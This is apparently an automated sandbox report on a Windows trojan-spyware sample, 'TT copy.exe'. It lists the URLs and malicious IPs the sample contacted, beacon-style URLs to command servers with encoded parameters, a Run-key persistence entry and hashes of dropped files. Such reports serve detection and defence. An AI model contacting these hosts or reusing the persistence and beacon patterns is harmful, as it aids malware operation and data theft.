                                                          http://fontfabrik.comTT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.fontbureau.comionmzTT copy.exe, 00000000.00000002.287711390.0000000001090000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.galapagosdesign.com/DPleaseTT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://ogs.google.com/widget/calloutprid=19020392&pgid=19020380&puid=93eb0881ae9ec1db&origin=https%rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.fonts.comTT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.sandoll.co.krTT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.urwpp.deDPleaseTT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.zhongyicts.com.cnTT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.sakkal.comTT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.msn.com/de-ch/ocid=iehprundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://consent.google.com/setpc=s&uxe=4421591rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.apache.org/licenses/LICENSE-2.0TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.fontbureau.comTT copy.exe, 00000000.00000002.287711390.0000000001090000.00000004.00000020.00020000.00000000.sdmp, TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://contextual.media.net/medianet.phpcid=8CU157172&crid=722878611&size=306x271&https=1;rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.google.com/intl/en_uk/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowserundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.fontbureau.comaMTT copy.exe, 00000000.00000002.287711390.0000000001090000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://www.google.com/searchpJrundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.google.com/gws_rd=sslh5-rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.sassafrasriver.info/umat/?bT7tPLpx=YjKReNU7fpMtyeRGaGRV8DawgxIzw/dI3fdHDlQJdSAE6vSrucr3Acrundll32.exe, 0000000F.00000002.775145614.00000000034BF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.775060097.0000000003460000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://www.sassafrasriver.info/umat/rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://contextual.media.net/checksync.php&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2Crundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.sassafrasriver.info/umat/om/rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://www.carterandcone.comlTT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;grundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://www.fontbureau.com/designers/cabarga.htmlNTT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.founder.com.cn/cnTT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          http://www.fontbureau.com/designers/frere-user.htmlTT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.sassafrasriver.info/umat/Lrundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.jiyu-kobo.co.jp/TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://consent.google.com/done8continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.goorundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.fontbureau.com/designers8TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.sassafrasriver.info/umat/9rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    http://www.sassafrasriver.info/umat/:rundll32.exe, 0000000F.00000002.775195320.00000000034E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://www.google.com/intl/en_uk/chrome/lrundll32.exe, 0000000F.00000002.775080171.000000000346A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://www.google.com/urlsa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwj8k7G9rJDsAhWNTxUIHZZGDCQQFrundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://www.google.com/searchsource=hp&ei=djJ0X6TKCL6IjLsPqriogAY&q=chrome&oq=chrome&gs_lcp=CgZwc3ktrundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.sassafrasriver.info/umat/0rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown

                                                                                                          World Map of Contacted IPs

                                                                                                          • No. of IPs < 25%
                                                                                                          • 25% < No. of IPs < 50%
                                                                                                          • 50% < No. of IPs < 75%
                                                                                                          • 75% < No. of IPs

                                                                                                          Public IPs

                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                          107.187.232.173
                                                                                                          		www.sarrafguler.comUnited States
                                                                                                          		18779EGIHOSTINGUStrue
                                                                                                          154.36.145.110
                                                                                                          		www.huayugw.comUnited States
                                                                                                          		174COGENT-174UStrue
                                                                                                          185.254.241.173
                                                                                                          		www.sinsegae.netUnited Kingdom
                                                                                                          		136782PINGTAN-AS-APKirinNetworksCNtrue
                                                                                                          23.227.38.74
                                                                                                          		shops.myshopify.comCanada
                                                                                                          		13335CLOUDFLARENETUStrue
                                                                                                          162.213.255.237
                                                                                                          		www.shopcycles3.comUnited States
                                                                                                          		22612NAMECHEAP-NETUStrue
                                                                                                          18.193.36.153
                                                                                                          		d1-hitch-eu-nlb-e064e2845fd0c838.elb.eu-central-1.amazonaws.comUnited States
                                                                                                          		16509AMAZON-02USfalse
                                                                                                          66.96.162.130
                                                                                                          		www.408wmountain.infoUnited States
                                                                                                          		29873BIZLAND-SDUStrue
                                                                                                          198.44.241.20
                                                                                                          		www.huiyi-sui.comUnited States
                                                                                                          		26484IKGUL-26484UStrue

                                                                                                          Private

                                                                                                          IP
                                                                                                          172.16.0.13

                                                                                                          General Information

                                                                                                          Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                          Analysis ID:638587
                                                                                                          Start date and time: 03/06/202208:14:092022-06-03 08:14:09 +02:00
                                                                                                          Joe Sandbox Product:CloudBasic
                                                                                                          Overall analysis duration:0h 13m 45s
                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                          Report type:full
                                                                                                          Sample file name:TT copy.exe
                                                                                                          Cookbook file name:default.jbs
                                                                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                          Number of analysed new started processes analysed:34
                                                                                                          Number of new started drivers analysed:0
                                                                                                          Number of existing processes analysed:0
                                                                                                          Number of existing drivers analysed:0
                                                                                                          Number of injected processes analysed:1
                                                                                                          Technologies:
                                                                                                          • HCA enabled
                                                                                                          • EGA enabled
                                                                                                          • HDC enabled
                                                                                                          • AMSI enabled
                                                                                                          Analysis Mode:default
                                                                                                          Analysis stop reason:Timeout
                                                                                                          Detection:MAL
                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@10/2@16/9
                                                                                                          EGA Information:
                                                                                                          • Successful, ratio: 100%
                                                                                                          HDC Information:
                                                                                                          • Successful, ratio: 62.2% (good quality ratio 57.3%)
                                                                                                          • Quality average: 73.5%
                                                                                                          • Quality standard deviation: 30.4%
                                                                                                          HCA Information:
                                                                                                          • Successful, ratio: 100%
                                                                                                          • Number of executed functions: 155
                                                                                                          • Number of non-executed functions: 175
                                                                                                          Cookbook Comments:
                                                                                                          • Found application associated with file extension: .exe
                                                                                                          • Adjust boot time
                                                                                                          • Enable AMSI
                                                                                                          • Override analysis time to 240s for rundll32

                                                                                                          Warnings

                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                          • Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                          Simulations

                                                                                                          Behavior and APIs

                                                                                                          TimeTypeDescription
                                                                                                          08:15:27API Interceptor1x Sleep call for process: TT copy.exe modified
                                                                                                          08:17:19API Interceptor1x Sleep call for process: explorer.exe modified
                                                                                                          08:17:19AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run PTHDNLT C:\Program Files (x86)\Euz8d\b60tqzo4nhevx.exe

                                                                                                          Joe Sandbox View / Context

                                                                                                          IPs

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                          154.36.145.110paymentcopy_0012.exeGet hashmaliciousBrowse
                                                                                                          • www.huayugw.com/umat/?vTAl2hqx=2PPXS0ByghwnUiXofzfHcTluxn0kF7CQXUmv2gLgzHNDwPHvxa5MhM39jfYGk5dQx2is&E6fT=0PnHHJyp
                                                                                                          23.227.38.74Popis narudzbi u prilogu.exeGet hashmaliciousBrowse
                                                                                                          • www.boardsandbeamsdecor.com/euv4/?ShKPBH=vko974XOxwnRXT9jLEv3OkMzdfNnydxLjvDFpz2gkbe4xk485cFYNUs71ryfnXxl50TW&TJED9=yPtl4FjXT
                                                                                                          Nova ozljeda 034245627782.DOC.exeGet hashmaliciousBrowse
                                                                                                          • www.rematedeldia.com/euv4/?jL3=0bgXdr&3f=E+AdldMsUtuIxZV3GzeilCEOXtaM5yG6oWVR/2hlbhe5LZ2inqV2BFV3XKjv+n3r1qMt
                                                                                                          jLVXJRVrps.exeGet hashmaliciousBrowse
                                                                                                          • www.maqitashop.com/vweq/?7nth=w6YXkXlp3B&T2M4SPdx=S4/TO+m26yV3DqixBO7CEtMih5IX0OGDHeHxx598F8EK+cWi4xRhhr/b5vUc7gji5Grt
                                                                                                          Company Profile.exeGet hashmaliciousBrowse
                                                                                                          • www.restlucid.com/f7sb/?Y4H4XZC=0+P4fCb8jv80c/fPiykPtl7wIddneBQlxV5dxaZHucI63xTdMOQbOvMBODdFXxNjBEvK&Xh0h=kH5l3X
                                                                                                          Company Profile.exeGet hashmaliciousBrowse
                                                                                                          • www.restlucid.com/f7sb/?hTqDeV=0+P4fCb8jv80c/fPiykPtl7wIddneBQlxV5dxaZHucI63xTdMOQbOvMBODdFXxNjBEvK&6ll0il=cTIhQrFX-F
                                                                                                          Novi cjenik u prilogu.exeGet hashmaliciousBrowse
                                                                                                          • www.rematedeldia.com/euv4/?THYH=E+AdldMsUtuIxZV3GzeilCEOXtaM5yG6oWVR/2hlbhe5LZ2inqV2BFV3XKjv+n3r1qMt&IPnHU4=TJE066CxCz_hD48
                                                                                                          SecuriteInfo.com.Variant.Tedy.120874.17150.exeGet hashmaliciousBrowse
                                                                                                          • www.sristiagrofarms.com/qnse/?u2J=uhHLxx0x8tXLDud2hlRJcsMNsP3Jl2I4p7TuDIsYKzm02FySQa6ZNXjL1s3EJ2AJrv+YmRH5Zg==&1b=A4O04PB8
                                                                                                          Advance Payment-pdf.exeGet hashmaliciousBrowse
                                                                                                          • www.herbalifego.store/ae25/?D8Rty8=d4Yp8tYhfDBD&YzrDx=3sCMpGdrJ3oezU5Walx4BoLxxp1U3uaEDZRrXuvFhaBlAVPhSwYFjcMSzdQed8y02ZbF
                                                                                                          IVN 725434522.exeGet hashmaliciousBrowse
                                                                                                          • www.wtxlaser.com/bg5r/?9r2=SI1e2jC1pdgsQS4zdzeiL8DecxGA8/NwPd7AD+HWX5YHuL/Cz7RCGRbiA63GfgVyMDoc&U6A=k0Dhghn03PeTv4p0
                                                                                                          SecuriteInfo.com.W32.AIDetectNet.01.18544.exeGet hashmaliciousBrowse
                                                                                                          • www.teleiig.com/hfhf/?m2MPMd=9aPM3DXFRPH037lxwKZyi33svmRf9VE24uTtZr01bqdh5wvkrLt1HDOW55vp676YF4Z8&w4h=d2JxPnN
                                                                                                          novo pedido.pdf.zGet hashmaliciousBrowse
                                                                                                          • www.dreamlovegifts.com/uevb/?cN6xa=5jcH8pLhav&J48Pd=Zs9sjlWMsJUnoXFnbQMqWCA+4+sAFZFN0q5qf6WhrhJIY8wI135B6vao5GFrVZdgbkkQ
                                                                                                          Bolt,Screw and Nuts Pdf.exeGet hashmaliciousBrowse
                                                                                                          • www.idealgel.store/rh2e/?_p=16pdpx3Z2CLnLsedcOAqFKSkp/PVRvaaRb/Fz/7YZqEn96gru6LtfyecFh8txU9LnOcbTQHAzA==&b2JLc=f0GX8zlxG
                                                                                                          louCCFrO4t.exeGet hashmaliciousBrowse
                                                                                                          • www.nelvashop.com/wn19/?cbi8pV=bXFHq2&eZe=74kz/+Omydv/tJV+ps5/T47bI5nxKh+DjdkrvIsUcwHn/m5f3NJjyQUUG1A7gP1GNjyQ
                                                                                                          PO-INQUIRY-VALE-SP-2022-60.exeGet hashmaliciousBrowse
                                                                                                          • www.shantellonlineshoph.com/j86w/?r0DdqnX=EvWqOpuITA36Tx+b1edEGBLtvk6gEbSmyN3aa/t6Vby44TN1y2mXcFBmC02e8zc2JU9V&THiL=OBZhFrvhwhfT
                                                                                                          2gl1wtChCW.exeGet hashmaliciousBrowse
                                                                                                          • www.threads34.store/wn19/?qL=rv1HgXCmNvTRWnk0t/PWMZTArWSxwY6VToXu23C5wd0SYVqo5hbnUnFufPtPTohMYlmc&3f=j48LRFwpOTO8ZZ10
                                                                                                          NEW ORDER.exeGet hashmaliciousBrowse
                                                                                                          • www.keilaniclothing.com/amdf/?i2JtQRj=/oFEaKse3b+9bUwDmBZBOOdpMJRIltPBO/GIVMmFEKpLcaQ5ll8yuFZgv1U3wDvmZl9m&1b3d=W6Tl74oXHxT
                                                                                                          FOB.exeGet hashmaliciousBrowse
                                                                                                          • www.skarpaknivar.com/itq4/?G6A=5fGKVan2CeJkvmWzjcSU9B7uKiQI1z+e0sTwE3xurJs5OMz97gZrg+cY3yxMh/dahrVH&G8wXH=d2MtHlXxA6Sp-VA
                                                                                                          PO4257802.exeGet hashmaliciousBrowse
                                                                                                          • www.etherealgoodsstore.com/eatw/?1bg8iRS8=X4FH6sFjsMse+EmPmvWjbOSqVd1+hPpA8FUsf4QBKYPcLBeKbrzdjTcdDeeGwt8LIyCB&v4=hZeT5FgXN
                                                                                                          Zahtjev je u prilogu.exeGet hashmaliciousBrowse
                                                                                                          • www.rematedeldia.com/euv4/?hN9h2=Hv38QzLXhZo0&BPS8=E+AdldMsUtuIxZV3GzeilCEOXtaM5yG6oWVR/2hlbhe5LZ2inqV2BFV3XJP/iWrQyfl8Exrprg==
                                                                                                          specyfikacja.xlsxGet hashmaliciousBrowse
                                                                                                          • www.tahnforest.com/ocgr/?k6fHa=kkcvVq0wi344hScNU4MaTtaHwAG6gu+AbYnshH2Mwdzmny692Kyslm9Zl5HbU1qzW86BLg==&ftx=Ap5TPphXonmpsH

                                                                                                          Domains

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                          www.huiyi-sui.compaymentcopy_0012.exeGet hashmaliciousBrowse
                                                                                                          • 198.44.241.20
                                                                                                          d1-hitch-eu-nlb-e064e2845fd0c838.elb.eu-central-1.amazonaws.compaymentcopy_0012.exeGet hashmaliciousBrowse
                                                                                                          • 18.193.36.153
                                                                                                          https://manchesterawning.dudaone.com/Get hashmaliciousBrowse
                                                                                                          • 3.67.141.185
                                                                                                          Payment confirmation reference.exeGet hashmaliciousBrowse
                                                                                                          • 18.193.36.153
                                                                                                          https://mihal-associates.multiscreensite.com/Get hashmaliciousBrowse
                                                                                                          • 3.127.73.216
                                                                                                          https://www.lanemedllc.com/Get hashmaliciousBrowse
                                                                                                          • 3.127.73.216
                                                                                                          ultDr2ofCk.exeGet hashmaliciousBrowse
                                                                                                          • 3.127.73.216
                                                                                                          p31FWTXZxT.exeGet hashmaliciousBrowse
                                                                                                          • 3.127.73.216
                                                                                                          New_order.exeGet hashmaliciousBrowse
                                                                                                          • 18.193.36.153
                                                                                                          PURCHASE.EXEGet hashmaliciousBrowse
                                                                                                          • 3.127.73.216
                                                                                                          Purchase_Order.exeGet hashmaliciousBrowse
                                                                                                          • 3.127.73.216
                                                                                                          PI-09876542345.exeGet hashmaliciousBrowse
                                                                                                          • 18.193.36.153
                                                                                                          Tecnimac Order SO22-54382.xlsxGet hashmaliciousBrowse
                                                                                                          • 3.67.141.185
                                                                                                          Payment Advice.xlsxGet hashmaliciousBrowse
                                                                                                          • 18.193.36.153
                                                                                                          Ass.exeGet hashmaliciousBrowse
                                                                                                          • 3.67.141.185
                                                                                                          d.exeGet hashmaliciousBrowse
                                                                                                          • 3.67.141.185
                                                                                                          NetCrULFzQ.exeGet hashmaliciousBrowse
                                                                                                          • 3.67.141.185
                                                                                                          invoice.exeGet hashmaliciousBrowse
                                                                                                          • 18.193.36.153
                                                                                                          6YqXY74A6zXfyQA.exeGet hashmaliciousBrowse
                                                                                                          • 3.67.141.185
                                                                                                          Order-Payment.exeGet hashmaliciousBrowse
                                                                                                          • 3.67.141.185
                                                                                                          order payment.exeGet hashmaliciousBrowse
                                                                                                          • 18.193.36.153
                                                                                                          www.408wmountain.infopaymentcopy_0012.exeGet hashmaliciousBrowse
                                                                                                          • 66.96.162.130

                                                                                                          ASNs

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                          EGIHOSTINGUSx86Get hashmaliciousBrowse
                                                                                                          • 107.164.204.45
                                                                                                          8CY7lwQQbQGet hashmaliciousBrowse
                                                                                                          • 166.93.191.7
                                                                                                          Shipment Consignment Notification-#U00a0 6183111.exeGet hashmaliciousBrowse
                                                                                                          • 107.187.31.215
                                                                                                          4I9zpWsNRBGet hashmaliciousBrowse
                                                                                                          • 205.164.26.4
                                                                                                          XWE736wRPvGet hashmaliciousBrowse
                                                                                                          • 192.177.167.70
                                                                                                          dD2niauWUc.exeGet hashmaliciousBrowse
                                                                                                          • 104.164.49.18
                                                                                                          thMtniHOSgGet hashmaliciousBrowse
                                                                                                          • 45.39.166.101
                                                                                                          SecuriteInfo.com.X97M.DownLoader.535.15867.xlsGet hashmaliciousBrowse
                                                                                                          • 107.187.232.27
                                                                                                          SecuriteInfo.com.X97M.DownLoader.535.950.xlsGet hashmaliciousBrowse
                                                                                                          • 107.187.232.27
                                                                                                          SecuriteInfo.com.X97M.DownLoader.535.20853.xlsGet hashmaliciousBrowse
                                                                                                          • 107.187.232.27
                                                                                                          SecuriteInfo.com.X97M.DownLoader.535.18563.xlsGet hashmaliciousBrowse
                                                                                                          • 107.187.232.27
                                                                                                          SecuriteInfo.com.X97M.DownLoader.535.9316.xlsGet hashmaliciousBrowse
                                                                                                          • 107.187.232.27
                                                                                                          SecuriteInfo.com.X97M.DownLoader.535.31748.xlsGet hashmaliciousBrowse
                                                                                                          • 107.187.232.27
                                                                                                          SecuriteInfo.com.X97M.DownLoader.535.31145.xlsGet hashmaliciousBrowse
                                                                                                          • 107.187.232.27
                                                                                                          SecuriteInfo.com.X97M.DownLoader.535.27076.xlsGet hashmaliciousBrowse
                                                                                                          • 107.187.232.27
                                                                                                          SecuriteInfo.com.X97M.DownLoader.535.4651.xlsGet hashmaliciousBrowse
                                                                                                          • 107.187.232.27
                                                                                                          SecuriteInfo.com.X97M.DownLoader.535.13662.xlsGet hashmaliciousBrowse
                                                                                                          • 107.187.232.27
                                                                                                          SecuriteInfo.com.X97M.DownLoader.535.26800.xlsGet hashmaliciousBrowse
                                                                                                          • 107.187.232.27
                                                                                                          SecuriteInfo.com.X97M.DownLoader.535.21931.xlsGet hashmaliciousBrowse
                                                                                                          • 107.187.232.27
                                                                                                          SecuriteInfo.com.X97M.DownLoader.535.13529.xlsGet hashmaliciousBrowse
                                                                                                          • 107.187.232.27
                                                                                                          COGENT-174USTropicalV1.armGet hashmaliciousBrowse
                                                                                                          • 206.234.73.168
                                                                                                          arm-20220602-1945Get hashmaliciousBrowse
                                                                                                          • 149.113.122.88
                                                                                                          armGet hashmaliciousBrowse
                                                                                                          • 38.183.120.14
                                                                                                          8xq7hsMfn0Get hashmaliciousBrowse
                                                                                                          • 149.18.7.172
                                                                                                          djWXcpcbUlGet hashmaliciousBrowse
                                                                                                          • 23.237.86.148
                                                                                                          r4z0r.armGet hashmaliciousBrowse
                                                                                                          • 38.83.42.147
                                                                                                          KWxsuEuN4yGet hashmaliciousBrowse
                                                                                                          • 38.137.84.147
                                                                                                          YEuBbqz209Get hashmaliciousBrowse
                                                                                                          • 23.154.10.238
                                                                                                          b1JMHtDdwqGet hashmaliciousBrowse
                                                                                                          • 38.10.205.225
                                                                                                          mipsGet hashmaliciousBrowse
                                                                                                          • 38.8.9.195
                                                                                                          Nova ozljeda 034245627782.DOC.exeGet hashmaliciousBrowse
                                                                                                          • 38.55.142.232
                                                                                                          BILL OF LADING-CI-PL-BL_xlsx.exeGet hashmaliciousBrowse
                                                                                                          • 154.23.227.120
                                                                                                          arm7Get hashmaliciousBrowse
                                                                                                          • 149.57.170.179
                                                                                                          x86Get hashmaliciousBrowse
                                                                                                          • 149.57.170.179
                                                                                                          armGet hashmaliciousBrowse
                                                                                                          • 149.57.170.179
                                                                                                          #U00aeInvoice Payment#U00ae.htmlGet hashmaliciousBrowse
                                                                                                          • 38.34.185.163
                                                                                                          c9O21NXLpHGet hashmaliciousBrowse
                                                                                                          • 206.238.164.50
                                                                                                          x86Get hashmaliciousBrowse
                                                                                                          • 149.110.96.157
                                                                                                          4PVahP5GIaGet hashmaliciousBrowse
                                                                                                          • 38.127.150.131
                                                                                                          arm6Get hashmaliciousBrowse
                                                                                                          • 38.216.188.67

                                                                                                          JA3 Fingerprints

                                                                                                          No context

                                                                                                          Dropped Files

                                                                                                          No context

                                                                                                          Created / dropped Files

                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TT copy.exe.log

                                                                                                          Download File
                                                                                                          Process:C:\Users\user\Desktop\TT copy.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1308
                                                                                                          Entropy (8bit):5.345811588615766
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84FsXE8:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzu
                                                                                                          MD5:2E016B886BDB8389D2DD0867BE55F87B
                                                                                                          SHA1:25D28EF2ACBB41764571E06E11BF4C05DD0E2F8B
                                                                                                          SHA-256:1D037CF00A8849E6866603297F85D3DABE09535E72EDD2636FB7D0F6C7DA3427
                                                                                                          SHA-512:C100729153954328AA2A77EECB2A3CBD03CB7E8E23D736000F890B17AAA50BA87745E30FB9E2B0D61E16DCA45694C79B4CE09B9F4475220BEB38CAEA546CFC2A
                                                                                                          Malicious:true
                                                                                                          Reputation:high, very likely benign file
                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                                                                          C:\Users\user\AppData\Local\Temp\DB1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                          Category:dropped
                                                                                                          Size (bytes):40960
                                                                                                          Entropy (8bit):0.792852251086831
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                          MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                          SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                          SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
